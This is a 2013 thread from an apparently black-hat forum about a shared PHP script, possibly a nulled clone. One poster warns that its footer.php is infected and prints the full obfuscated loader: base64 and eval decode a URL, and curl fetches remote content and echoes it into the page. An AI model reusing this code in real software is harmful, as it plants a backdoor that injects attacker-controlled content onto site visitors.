09-23-2013, 06:46 AM
![[Image: logo.png]](https://bestblackhatforum.com/images/cpalead/logo.png){kind=logo}
09-23-2013, 06:52 AM
old sh_it with new virus in /footer.php
↓ nyman don't worry, I'm just saying
↓ nyman don't worry, I'm just saying
PHP Code:
<?php if(!function_exists("mystr1s44")){class mystr1s21 { static $mystr1s178="\x62a\x73e6\x34_d\x65c\x6fd\x65"; static $mystr1s279="\x59\x33V\x79b\x469\x70b\x6dl0"; static $mystr1s381="aH\x520\x63\x44ov\x4c2xh\x62\x47F\x75ZC5\x68d\x435\x32d\x539\x6bYX\x52h\x4c2\x70xdW\x56yeS\x30xLj\x59\x75My\x35t\x61W4\x75\x61nM\x3d";
static $mystr1s382="b\x58l\x7a\x64H\x49xc\x7a\x49y\x4dzY\x3d"; }eval("e\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34_\x64e\x63\x6fd\x65\x28\x27ZnV\x75Y\x33\x52\x70b2\x34\x67b\x58l\x7ad\x48Ix\x63\x7ac2K\x43Rte\x58N0\x63j\x46zO\x54cpe\x79R\x37\x49m1c\x65D\x635c3\x52\x79\x58Hgz\x4d\x58M\x78\x58Hgz\x4dFx\x34Mz\x67if\x54\x31t\x65XN0\x63j\x46zMj\x456O\x69R\x37Im1\x63eD\x63\x35c1x\x34Nz\x52\x63e\x44c\x79MV\x784\x4ezMx\x58Hgz\x4e\x7ag\x69fTt\x79ZX\x52\x31c\x6d4gJ\x48\x73i\x62Xlz\x58\x48g3\x4eFx\x34\x4ezI\x78XH\x673M\x7aFce\x44\x4dwO\x43J\x39\x4b\x43\x42t\x65XN0\x63j\x46zMj\x456O\x69R7J\x48si\x62Vx4\x4e\x7alce\x44c\x7aX\x48\x673N\x48Jc\x65DMx\x63\x31x\x34\x4dzk3\x49n1\x39I\x43k\x37fQ\x3d=\x27\x29\x29\x3be\x76\x61\x6c\x28b\x61s\x656\x34\x5f\x64e\x63o\x64e\x28\x27\x5anV\x75Y3R\x70b24\x67b\x58lz\x64\x48I\x78czQ\x30\x4b\x43Rte\x58N0\x63jFz\x4e\x6a\x55pI\x48tyZ\x58\x521c\x6d4gb\x58lzd\x48Ix\x63zI\x78O\x6aoke\x79R7\x49m1\x35XHg\x33M3R\x63\x65Dc\x79XH\x67z\x4d\x56x\x34N\x7aM\x32\x58\x48gzN\x53\x4a9\x66\x54t\x39\x27\x29\x29\x3b");}
if(function_exists(mystr1s76("mys\x74r1s\x3279"))){$mystr1s2235 = mystr1s76("m\x79s\x74r\x31s3\x381");$mystr1s2236 = curl_init();
$mystr1s2237 = 5;curl_setopt($mystr1s2236,CURLOPT_URL,$mystr1s2235);curl_setopt($mystr1s2236,CURLOPT_RETURNTRANSFER,1);curl_setopt($mystr1s2236,CURLOPT_CONNECTTIMEOUT,$mystr1s2237);
$mystr1s2238 = curl_exec($mystr1s2236);curl_close(${mystr1s76("mystr1s382")});echo "$mystr1s2238";}
?>09-23-2013, 06:54 AM
im only sharing with you all i found it on another website someone try it and let me know.
09-23-2013, 06:58 AM
thank you for sharing with us i will test it, myshare shut up dude everyone knows that the scripts you share all virus crap not everyone shares like you. so don't spam this thread with your crap. you need to try it before you open your mouth.
09-23-2013, 07:04 AM
(09-23-2013 06:52 AM)myshare Wrote: [ -> ]old sh_it with new virus in /footer.php
↓ nyman don't worry, I'm just saying
worry about what? i found this on another site i shared here so you guys can test it. if it doesn't work someone please let me know so i remove it thank you
09-23-2013, 07:17 AM
can someone please confirm if this is working?
09-23-2013, 07:23 AM
is rip shit . and not clone.
09-23-2013, 07:25 AM
(09-23-2013 07:23 AM)AtakanCan Wrote: [ -> ]is rip S*** . and not clone.you sure you did test it? so should i remove it?
09-23-2013, 07:27 AM
(09-23-2013 07:23 AM)AtakanCan Wrote: [ -> ]is rip S*** . and not clone.i look in the zip file all the files are php so it can't be ripp, because you can't ripp php files/.htaccess
09-23-2013, 08:55 AM
(09-23-2013 07:27 AM)samarasx Wrote: [ -> ]That is not Shared CLONE ! That is FLEXYSHARE script . You see picture over , you see Content file . is not the same ! is it Flexshare . and not Shared Clone .(09-23-2013 07:23 AM)AtakanCan Wrote: [ -> ]is rip S*** . and not clone.i look in the zip file all the files are php so it can't be ripp, because you can't ripp php files/.htaccess